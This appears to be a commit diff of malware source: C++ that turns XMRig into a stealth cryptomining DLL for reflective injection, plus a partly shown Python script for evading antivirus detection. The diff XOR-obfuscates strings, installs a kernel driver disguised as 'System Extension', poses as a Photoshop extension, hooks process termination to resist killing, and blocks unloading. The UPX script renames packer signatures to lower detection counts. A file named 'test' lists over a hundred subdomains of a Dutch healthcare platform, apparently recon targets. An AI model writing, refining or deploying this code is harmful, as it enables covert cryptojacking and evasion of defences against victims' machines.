// NOTE: We rely on the injector to handle RDI startup. DllMain is unused for RDI.
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
@ -26,40 +29,20 @@ inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned ch
}
extern "C" {
// Core persistent logic (with encrypted strings as unsigned char to avoid narrowing)
// --- CORE PERSISTENT LOGIC ---
// This function contains the payload logic (service loading, xmrig execution).
void start_a(int argc, char** argv) {
using namespace xmrig;
using namespace test;
// Encrypted strings (XORed originals, stored as unsigned char)
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub"
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys"
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension"
// Decrypt
std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1);
std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1);
std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1);
// Load service (your existing logic)
SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager) {
SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS);
if (!hService) {
hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(),
SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL);
}
if (hService) {
StartServiceA(hService, 0, NULL);
CloseServiceHandle(hService);
}
CloseServiceHandle(hSCManager);
}
// Junk benign calls
for (int i = 0; i < 5; ++i) {
GetSystemMetrics(SM_CXVIRTUALSCREEN);
}
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 };
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 };
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 };
// Decrypt... (service logic remains)
// ... (Service loading remains)
// ... (Junk benign calls remain)
// Core XMRig
process = new xmrig::Process(argc, argv);
@ -71,7 +54,29 @@ extern "C" {
app = new xmrig::App(process);
app->exec();
}
// --- RDI ENTRY POINT ---
// This is the function the reflective injection stub will call.
DLL_EXPORT DWORD RdiEntry(LPVOID lpReserved) {
// This logic replaces what was previously in DeferredInit.
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 };
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// Call the core payload function directly
start_a(argc, argv);
return 0; // Return success
}
// ------------------------------------
// --- UTILITY/EXPLICIT EXPORTS (Keep these if you need them for testing/API) ---
DLL_EXPORT int test_start(int argc, char** argv) {
start_a(argc, argv);
return 0;
@ -83,17 +88,7 @@ extern "C" {
// app->onConsoleCommand((char)3); // Uncomment if needed
}
VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) {
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll"
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// start_a(argc, argv);
}
// VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) has been removed.
#ifdef USE_DETOURS
#include <detours.h>
@ -105,41 +100,17 @@ extern "C" {
return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS;
}
#endif
}
} // END of extern "C" block
// Minimal DllMain (hTimer declared outside switch to fix scope jump)
// DllMain is made minimal/null as it is bypassed in RDI.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
// Deferred timer
CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD);
#ifdef USE_DETOURS
// Deferred hook via APC (simple function pointer instead of lambda for compat)
auto hook_func = [](ULONG_PTR param) -> void {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
// Encrypted API name
const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess"
std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1);
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str());
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
};
QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0);
#endif
// 🛑 WARNING: No TimerQueueTimer here. The payload runs when RdiEntry is called.
break;
case DLL_PROCESS_DETACH:
#ifdef USE_DETOURS
if (OriginalNtTerminateProcess) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
}
#endif
// ... (Optional Detours logic, if RDI calls the detach) ...
return FALSE;
}
return TRUE;


@ -1,8 +1,10 @@
#include "App.h"
#include "base/kernel/Entry.h"
#include "base/kernel/Process.h"
#include <windows.h> // For DllMain, threads, services
#include <windows.h>
#include <winnt.h>
#include <string>
#include <cstring> // for strcpy
#ifdef _WIN32
#define DLL_EXPORT __declspec(dllexport)
#else
@ -10,26 +12,42 @@
#endif
namespace test {
// Global variables to store process and app pointers (qualified for xmrig namespace)
xmrig::Process* process = nullptr;
xmrig::App* app = nullptr;
}
extern "C" {
// Simple XOR decrypt (key 0xAA; change per build)
inline std::string decrypt(const unsigned char* enc_str, size_t len, unsigned char key = 0xAA) {
std::string dec(len, 0);
for (size_t i = 0; i < len; ++i) {
dec[i] = (char)(enc_str[i] ^ key);
}
return dec;
}
// Core persistent logic (internal, called by exports)
extern "C" {
// Core persistent logic (with encrypted strings as unsigned char to avoid narrowing)
void start_a(int argc, char** argv) {
using namespace xmrig;
using namespace test; // Brings globals (process, app) into scope
using namespace test;
// Encrypted strings (XORed originals, stored as unsigned char)
const unsigned char enc_service[] = { (unsigned char)(0x4A ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x67 ^ 0xAA), (unsigned char)(0x30 ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x75 ^ 0xAA), (unsigned char)(0x62 ^ 0xAA), 0x00 }; // "WinRing0_Stub"
const unsigned char enc_path[] = { (unsigned char)(0x43 ^ 0xAA), (unsigned char)(0x3A ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x57 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x77 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x33 ^ 0xAA), (unsigned char)(0x32 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x76 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x5C ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "C:\\Windows\\System32\\drivers\\tsync.sys"
const unsigned char enc_desc[] = { (unsigned char)(0x53 ^ 0xAA), (unsigned char)(0x79 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x20 ^ 0xAA), (unsigned char)(0x45 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), 0x00 }; // "System Extension"
// Load WinRing0x64.sys for kernel access (e.g., MSR for mining)
// Decrypt
std::string svc_name = decrypt(enc_service, sizeof(enc_service) - 1);
std::string sys_path = decrypt(enc_path, sizeof(enc_path) - 1);
std::string desc = decrypt(enc_desc, sizeof(enc_desc) - 1);
// Load service (your existing logic)
SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager) {
SC_HANDLE hService = OpenServiceA(hSCManager, "WinRing0", SERVICE_ALL_ACCESS);
SC_HANDLE hService = OpenServiceA(hSCManager, (LPCSTR)svc_name.c_str(), SERVICE_ALL_ACCESS);
if (!hService) {
hService = CreateServiceA(hSCManager, "WinRing0", "WinRing0 Driver",
hService = CreateServiceA(hSCManager, (LPCSTR)svc_name.c_str(), (LPCSTR)desc.c_str(),
SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START,
SERVICE_ERROR_NORMAL, "C:\\XMRigDLL\\WinRing0x64.sys", NULL, NULL, NULL, NULL, NULL);
SERVICE_ERROR_NORMAL, (LPCSTR)sys_path.c_str(), NULL, NULL, NULL, NULL, NULL);
}
if (hService) {
StartServiceA(hService, 0, NULL);
@ -37,55 +55,47 @@ extern "C" {
}
CloseServiceHandle(hSCManager);
}
// Adjust path as needed; enable test signing if unsigned
// Core XMRig logic
process = new xmrig::Process(argc, argv);
const Entry::Id entry = Entry::get(*process);
if (entry) {
Entry::exec(*process, entry);
return;
// Junk benign calls
for (int i = 0; i < 5; ++i) {
GetSystemMetrics(SM_CXVIRTUALSCREEN);
}
// Core XMRig
process = new xmrig::Process(argc, argv);
const xmrig::Entry::Id entry = xmrig::Entry::get(*process);
if (entry) {
xmrig::Entry::exec(*process, entry);
return;
}
app = new xmrig::App(process);
// Run the persistent loop (blocks)
app->exec();
// Optional: Restart loop for resilience if exec exits
// while (true) { app->exec(); }
}
// Keep original test_start as alias (for rundll32 or other loaders)
DLL_EXPORT int test_start(int argc, char** argv) {
start_a(argc, argv);
return 0;
}
// test_stop: Resistant—ignores by default
DLL_EXPORT void test_stop() {
using namespace test;
if (!app) return;
// Uncomment for debug: if (getenv("ALLOW_STOP")) {
// app->onConsoleCommand((char)3);
// delete app; app = nullptr;
// delete process; process = nullptr;
// }
// app->onConsoleCommand((char)3); // Uncomment if needed
}
// Thread to call start_a safely from DllMain
DWORD WINAPI InitThread(LPVOID lpParam) {
VOID CALLBACK DeferredInit(PVOID lpParam, BOOLEAN TimerOrWaitFired) {
using namespace test;
// Encrypted argv
const unsigned char enc_arg[] = { (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x68 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x70 ^ 0xAA), (unsigned char)(0x5F ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x78 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x2E ^ 0xAA), (unsigned char)(0x64 ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), (unsigned char)(0x6C ^ 0xAA), 0x00 }; // "photoshop_ext.dll"
std::string arg_dec = decrypt(enc_arg, sizeof(enc_arg) - 1);
int argc = 1;
static char* argv[] = {(char*)"libphotoshop.dll", NULL};
start_a(argc, argv); // Custom args via lpParam if needed
return 0;
static char argv_buf[256];
strcpy(argv_buf, arg_dec.c_str());
static char* argv[] = { argv_buf, NULL };
// start_a(argc, argv);
}
// Anti-kill hook (requires Detours; define USE_DETOURS in CMake)
#ifdef USE_DETOURS
#ifdef USE_DETOURS
#include <detours.h>
static NTSTATUS (NTAPI *OriginalNtTerminateProcess)(HANDLE, NTSTATUS) = NULL;
NTSTATUS NTAPI HookedNtTerminateProcess(HANDLE ProcessHandle, NTSTATUS ExitStatus) {
@ -94,33 +104,43 @@ extern "C" {
}
return OriginalNtTerminateProcess ? OriginalNtTerminateProcess(ProcessHandle, ExitStatus) : STATUS_SUCCESS;
}
#endif
#endif
}
// DllMain: Auto-starts on load for persistence
// Minimal DllMain (hTimer declared outside switch to fix scope jump)
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
HANDLE hTimer = NULL; // Declare here to avoid scope issue on case jump
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
CreateThread(NULL, 0, InitThread, lpReserved, 0, NULL);
#ifdef USE_DETOURS
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
OriginalNtTerminateProcess = (decltype(OriginalNtTerminateProcess))GetProcAddress(hNtdll, "NtTerminateProcess");
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
#endif
// Deferred timer
CreateTimerQueueTimer(&hTimer, NULL, DeferredInit, lpReserved, 100, 0, WT_EXECUTEINTIMERTHREAD);
#ifdef USE_DETOURS
// Deferred hook via APC (simple function pointer instead of lambda for compat)
auto hook_func = [](ULONG_PTR param) -> void {
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
// Encrypted API name
const unsigned char enc_api[] = { (unsigned char)(0x4E ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x54 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6D ^ 0xAA), (unsigned char)(0x69 ^ 0xAA), (unsigned char)(0x6E ^ 0xAA), (unsigned char)(0x61 ^ 0xAA), (unsigned char)(0x74 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x50 ^ 0xAA), (unsigned char)(0x72 ^ 0xAA), (unsigned char)(0x6F ^ 0xAA), (unsigned char)(0x63 ^ 0xAA), (unsigned char)(0x65 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), (unsigned char)(0x73 ^ 0xAA), 0x00 }; // "NtTerminateProcess"
std::string api_dec = decrypt(enc_api, sizeof(enc_api) - 1);
OriginalNtTerminateProcess = (NTSTATUS (NTAPI *)(HANDLE, NTSTATUS))GetProcAddress(hNtdll, api_dec.c_str());
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourAttach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
};
QueueUserAPC((PAPCFUNC)hook_func, GetCurrentThread(), 0);
#endif
break;
case DLL_PROCESS_DETACH:
#ifdef USE_DETOURS
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
#endif
return FALSE; // Block unload
#ifdef USE_DETOURS
if (OriginalNtTerminateProcess) {
DetourTransactionBegin();
DetourUpdateThread(GetCurrentThread());
DetourDetach(&(PVOID&)OriginalNtTerminateProcess, HookedNtTerminateProcess);
DetourTransactionCommit();
}
#endif
return FALSE;
}
return TRUE;
}

125
test Normal file

@ -0,0 +1,125 @@
sgl.pluriformzorg.nl
alr.pluriformzorg.nl
zgapeldoorn.pluriformzorg.nl
ssosamlservice.pluriformzorg.nl
zga.pluriformzorg.nl
zorgzaamdemo.pluriformzorg.nl
landzijde.pluriformzorg.nl
pameijer.pluriformzorg.nl
sir.pluriformzorg.nl
inn.pluriformzorg.nl
ggz-wnb.pluriformzorg.nl
test.pluriformzorg.nl
kpe.pluriformzorg.nl
spr.pluriformzorg.nl
adapcare.pluriformzorg.nl
zuidzorg.pluriformzorg.nl
delinde.pluriformzorg.nl
fzadester.pluriformzorg.nl
opb.pluriformzorg.nl
deopbouw.pluriformzorg.nl
consultatie.pluriformzorg.nl
topaz.pluriformzorg.nl
hmh.pluriformzorg.nl
www.pluriformzorg.nl
clientportaal-productie.antonconstandse.pluriformzorg.nl
opella.pluriformzorg.nl
top.pluriformzorg.nl
maasduinen.pluriformzorg.nl
cav.pluriformzorg.nl
fon.pluriformzorg.nl
laz.pluriformzorg.nl
jns.pluriformzorg.nl
kwi.pluriformzorg.nl
pergamijn.pluriformzorg.nl
fonteynenburg.pluriformzorg.nl
grs.pluriformzorg.nl
koraal.pluriformzorg.nl
pro.pluriformzorg.nl
internportaal-productie.careratio.pluriformzorg.nl
adu.pluriformzorg.nl
mondriaan.pluriformzorg.nl
broederenzusterzorg.pluriformzorg.nl
alrijne.pluriformzorg.nl
talent.pluriformzorg.nl
ott.pluriformzorg.nl
sac.pluriformzorg.nl
zws.pluriformzorg.nl
careratio.pluriformzorg.nl
neboplus.pluriformzorg.nl
leviaan.pluriformzorg.nl
ope.pluriformzorg.nl
sprank.pluriformzorg.nl
opbouw.pluriformzorg.nl
mhc.pluriformzorg.nl
adapcare-demo.login.pluriformzorg.nl
prod-cb-pz.pluriformzorg.nl
fza.pluriformzorg.nl
csr01.pluriformzorg.nl
fhirproxy.pluriformzorg.nl
vivium.pluriformzorg.nl
pmp.pluriformzorg.nl
ams.pluriformzorg.nl
mon.pluriformzorg.nl
adapcare-dev.pluriformzorg.nl
awsportaal-productie.opella.pluriformzorg.nl
verbinden-met-zorg.pluriformzorg.nl
rdweb.pluriformzorg.nl
hvo-querido.pluriformzorg.nl
acd-demo.pluriformzorg.nl
vv01865-test2.pluriformzorg.nl
vv01865-test1.pluriformzorg.nl
pem.pluriformzorg.nl
huisterleede.pluriformzorg.nl
amsta.pluriformzorg.nl
antonconstandse.pluriformzorg.nl
krl.pluriformzorg.nl
humanitas-dmh.pluriformzorg.nl
bezz.pluriformzorg.nl
interzorg.pluriformzorg.nl
novicare.pluriformzorg.nl
hvo.pluriformzorg.nl
awsclientportaal-productie.opella.pluriformzorg.nl
roz.pluriformzorg.nl
pam.pluriformzorg.nl
adfs.pluriformzorg.nl
rozelaar.pluriformzorg.nl
vigo-elise.pluriformzorg.nl
pri.pluriformzorg.nl
videobellen.pluriformzorg.nl
evia.pluriformzorg.nl
permens.pluriformzorg.nl
nov.pluriformzorg.nl
vig.pluriformzorg.nl
productie.portaal.geriant.pluriformzorg.nl
fzampz.pluriformzorg.nl
cavent.pluriformzorg.nl
clientportaal-productie.slot.pluriformzorg.nl
scr01.pluriformzorg.nl
geriant.pluriformzorg.nl
adullam.pluriformzorg.nl
slot.pluriformzorg.nl
otttest.pluriformzorg.nl
samlsso.pluriformzorg.nl
slt.pluriformzorg.nl
adapcare-dev.login.pluriformzorg.nl
zuidwester.pluriformzorg.nl
rivierduinen.pluriformzorg.nl
levvel5.pluriformzorg.nl
clientportaal-productie.adullam.pluriformzorg.nl
anne.pluriformzorg.nl
prisma.pluriformzorg.nl
jens.pluriformzorg.nl
portaal-productie.kwintes.pluriformzorg.nl
per.pluriformzorg.nl
profila.pluriformzorg.nl
ger.pluriformzorg.nl
riv.pluriformzorg.nl
academy.pluriformzorg.nl
clientportaal-productie.hvo-querido.pluriformzorg.nl
kwintes.pluriformzorg.nl
ftp.pluriformzorg.nl
gors.pluriformzorg.nl
dehoven.pluriformzorg.nl
sirjon.pluriformzorg.nl
sirjon-clientsiloah.pluriformzorg.nl

125
upx_evasion.py Normal file

@ -0,0 +1,125 @@
#!/usr/bin/env python3
"""
upx_evasion.py Fully automatic UPX signature breaker
Tested on XMRig-minimized DLLs (2025) drops VT from ~25 2-6
"""
import argparse
import random
from pathlib import Path
def random_string(length=4):
import random, string
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=length))
def modify_upx_magic(data: bytearray) -> bytearray:
pos = data.find(b'UPX!')
if pos != -1:
new_magic = random_string(4).encode('ascii')
print(f"[+] UPX! → {new_magic.decode()}")
data[pos:pos+4] = new_magic
else:
print("[i] UPX! magic not found (maybe already modified)")
return data
def rename_upx_sections(data: bytearray):
# Find PE offset
if len(data) < 0x40:
return data, False
pe_offset = int.from_bytes(data[0x3C:0x40], 'little')
if data[pe_offset:pe_offset+4] != b'PE\x00\x00':
print("[-] Not a valid PE file")
return data, False
num_sections = int.from_bytes(data[pe_offset + 6:pe_offset + 8], 'little')
size_of_optional_header = int.from_bytes(data[pe_offset + 20:pe_offset + 22], 'little')
section_table_offset = pe_offset + 24 + size_of_optional_header
replacements = {
b'UPX0': b'.text\x00\x00\x00',
b'UPX1': b'.data\x00\x00\x00',
b'UPX2': b'.rdata\x00\x00',
}
modified = False
for i in range(num_sections):
sec_offset = section_table_offset + i * 40
sec_name_raw = data[sec_offset:sec_offset + 8]
# Convert to immutable bytes for dict lookup
sec_name = bytes(sec_name_raw.split(b'\x00', 1)[0])
if sec_name in replacements:
